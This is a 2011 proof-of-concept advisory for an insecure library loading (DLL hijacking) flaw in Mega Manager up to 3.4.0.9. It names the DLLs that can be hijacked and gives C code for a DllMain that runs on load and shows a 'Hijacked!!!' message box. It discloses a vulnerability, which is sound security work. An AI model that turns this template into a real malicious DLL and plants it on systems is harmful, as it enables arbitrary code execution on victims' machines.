============ { Advisory 02/03/2011 } =============

/*

PoC Title: Mega Menager <= 3.4.0.9 Insecure Library Loading Vulnerability

(dwmapi.dll,msjet49.dll,msjet48.dll,msjet47.dll,msjet46.dll,msjet45.dll)

Software Link: http://www.megaupload.com/?c=tools

Associated Extension: .megamanager

Tested on: Windows xp sp3 x32

*/
#include <windows.h>

BOOL WINAPI DllMain (

HANDLE    hinstDLL,

DWORD     fdwReason,

LPVOID    lpvReserved

)

{

switch (fdwReason)

{

case DLL_PROCESS_ATTACH:

exploit();

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break;    }

return TRUE;}

int exploit()

{

MessageBox(0, “Hijacked!!!”, “DLL Message”, MB_OK);

}

/*

Credits:

# Discoverd By: Locu

# Website: http://xlocux.wordpress.com

# Contacts: xlocux[-at-]gmail.com

*/

================== { EOF } =====================